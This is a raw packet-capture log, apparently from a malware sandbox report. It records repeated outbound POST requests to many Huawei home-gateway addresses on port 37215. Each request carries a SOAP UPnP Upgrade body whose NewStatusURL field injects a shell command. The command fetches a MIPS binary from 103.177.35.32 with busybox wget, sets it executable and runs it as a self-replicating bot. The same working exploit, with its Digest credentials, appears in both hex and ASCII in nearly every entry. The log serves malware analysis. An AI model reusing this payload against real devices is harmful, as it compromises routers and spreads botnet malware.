                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3170192.168.2.235951441.121.80.20637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659985065 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3171192.168.2.2359450197.238.7.7037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659992933 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3172192.168.2.234832841.70.20.17637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660000086 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3173192.168.2.2358670197.4.174.19037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660007954 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3174192.168.2.2353394197.167.159.10337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660017014 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3175192.168.2.2360906197.170.165.16437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660419941 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3176192.168.2.2352036157.193.198.16837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660419941 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3177192.168.2.234265841.239.190.10237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660429955 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3178192.168.2.236004641.47.56.14937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660439014 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3179192.168.2.234934883.188.33.15137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660449982 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
